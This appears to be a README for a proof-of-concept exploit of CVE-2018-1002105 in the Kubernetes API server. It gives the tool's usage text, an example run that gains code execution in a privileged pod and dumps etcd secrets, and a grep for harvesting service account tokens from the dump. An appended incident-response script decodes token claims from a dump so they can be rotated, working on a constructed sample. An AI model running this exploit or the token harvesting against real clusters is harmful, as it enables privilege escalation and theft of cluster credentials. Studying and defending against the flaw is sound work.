Proof-of-Concept exploit for CVE-2018-1002105. The current exploit requires `create` and `get` privileges on `pods` and `pods/exec`. If you do not know what that means, this is probably not meant for you. :)

The current PoC dumps the secrets from the default `etcd-kubernetes` pod.
The PoC in action:

```
usage: poc.py [-h] --target TARGET --jwt TOKEN [--namespace NAMESPACE] --pod
              POD [--privileged-namespace PNAMESPACE] [--privileged-pod PPOD]
              [--container CONTAINER] [--command COMMAND]
              [--filename FILENAME]

PoC for CVE-2018-1002105.

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  --target TARGET, -t TARGET
                        API server target:port
  --jwt TOKEN, -j TOKEN
                        JWT token for service account
  --namespace NAMESPACE, -n NAMESPACE
                        Namespace with exec access
  --pod POD, -p POD     Pod with exec access

optional arguments:
  --privileged-namespace PNAMESPACE, -s PNAMESPACE
                        Target namespace
  --privileged-pod PPOD, -e PPOD
                        Target privileged pod
  --container CONTAINER, -c CONTAINER
                        Target container
  --command COMMAND, -x COMMAND
                        Command to execute
  --filename FILENAME, -f FILENAME
                        File to save output to
```
Example:

```
$ ./poc.py -t 10.0.2.15:6443 --jwt [token] -p [pod] -f etcd.out
[*] Building pipe...
[+] Pipe opened :D
[*] Attempting code exec in pod
[*] Writing output to etcd.out ....
[+] Done!
```
Check for tokens:

```
$ grep -air eyJ etcd.db
```
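Added incident-response example, not part of the PoC or its repository: once an etcd dump or backup is suspected to have been read, the responder needs to know which service account tokens it contained so those secrets can be rotated, not only that some `eyJ` strings exist. The script extends the grep above by decoding each JWT payload and reporting the namespace, service account and secret name; it assumes the legacy service account token claim names (`sub` of the form `system:serviceaccount:<ns>:<name>` and `kubernetes.io/serviceaccount/secret.name`), and the sample dump is constructed inline.

```python
import base64
import json
import os
import re

# A base64url-encoded JSON object always starts with "eyJ" ('{"' encoded),
# which is why the README greps the dump for that prefix.
JWT_RE = re.compile(rb"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")

def _b64url_decode(segment: bytes) -> bytes:
    return base64.urlsafe_b64decode(segment + b"=" * (-len(segment) % 4))

def _b64url_encode(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")

def extract_service_account_tokens(blob: bytes):
    """Return (namespace, service account, secret name) for each distinct JWT
    in the blob whose payload parses as a Kubernetes service account token.
    The token value itself is deliberately not returned or printed."""
    seen, report = set(), []
    for match in JWT_RE.finditer(blob):
        token = match.group(0)
        if token in seen:
            continue
        seen.add(token)
        try:
            claims = json.loads(_b64url_decode(token.split(b".")[1]))
        except ValueError:  # binascii.Error, UnicodeDecodeError, JSONDecodeError
            continue        # an "eyJ" string that is not a JWT at all
        sub = claims.get("sub", "")
        if not sub.startswith("system:serviceaccount:"):
            continue        # some other JWT, e.g. an OIDC id token
        _, _, namespace, name = sub.split(":", 3)
        # Assumed legacy claim name; "<unknown>" if the token lacks it.
        secret = claims.get("kubernetes.io/serviceaccount/secret.name", "<unknown>")
        report.append((namespace, name, secret))
    return report

def _constructed_token(namespace: str, name: str, secret: str) -> bytes:
    """Structurally valid but unsigned token, built only to seed the sample."""
    header = _b64url_encode(json.dumps({"alg": "RS256"}).encode())
    payload = _b64url_encode(json.dumps({
        "iss": "kubernetes/serviceaccount",
        "sub": f"system:serviceaccount:{namespace}:{name}",
        "kubernetes.io/serviceaccount/secret.name": secret,
    }).encode())
    return header + b"." + payload + b"." + _b64url_encode(os.urandom(16))

# Constructed stand-in for an etcd dump: binary noise around two tokens (the
# first stored twice) plus one "eyJ" fragment whose payload is not JSON.
_T1 = _constructed_token("kube-system", "default", "default-token-abc12")
_T2 = _constructed_token("payments", "api", "api-token-xyz99")
SAMPLE_DUMP = (b"\x00k8s\x00\x01" + _T1 + b"\x00\x02" + _T2 + b"\x03" + _T1
               + b"\x00eyJmb28iOjF9.bm90.anNvbg\x00")
```

Run against a real dump by passing the file's bytes instead of `SAMPLE_DUMP`; each reported secret is one to delete so the controller re-issues it.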